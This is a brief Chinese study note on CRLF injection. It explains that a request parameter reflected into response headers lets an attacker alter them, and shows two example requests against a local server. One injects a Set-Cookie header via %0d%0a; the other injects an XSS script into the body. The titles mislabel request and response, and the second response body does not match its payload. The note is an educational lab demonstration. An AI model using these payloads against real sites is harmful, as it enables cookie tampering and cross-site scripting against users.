【漏洞】CRLF学习笔记

前言

CRLF学习笔记

漏洞原理

  • 如果请求参数被写在了响应头中,则可以通过CRLF漏洞来篡改响应头或响应体

漏洞利用

篡改请求头

  • 通过1组%0d%0a实现1次换行,从而篡改请求头
request
1
GET http://127.0.0.1:8080/?key=value%0d%0aSet-Cookie:key=value
1
2
3
4
5
6
HTTP/1.1 200 OK
Date: Thu, 13 Jun 2024 06:07:48 GMT
Content-Length: 0
Content-Type: text/html; charset=utf-8
Key: value
Set-Cookie:key=value

篡改请求体

  • 通过2组%0d%0a实现2次换行,从而篡改请求体
request
1
GET http://127.0.0.1:8080/?key=value%0d%0a%0d%0a<script>alert(1)</script>
1
2
3
4
5
6
7
HTTP/1.1 200 OK
Date: Thu, 13 Jun 2024 06:07:48 GMT
Content-Length: 10
Content-Type: text/html; charset=utf-8
Key: value

<h1>1</h1>

完成

参考文献

哔哩哔哩——xiaodisec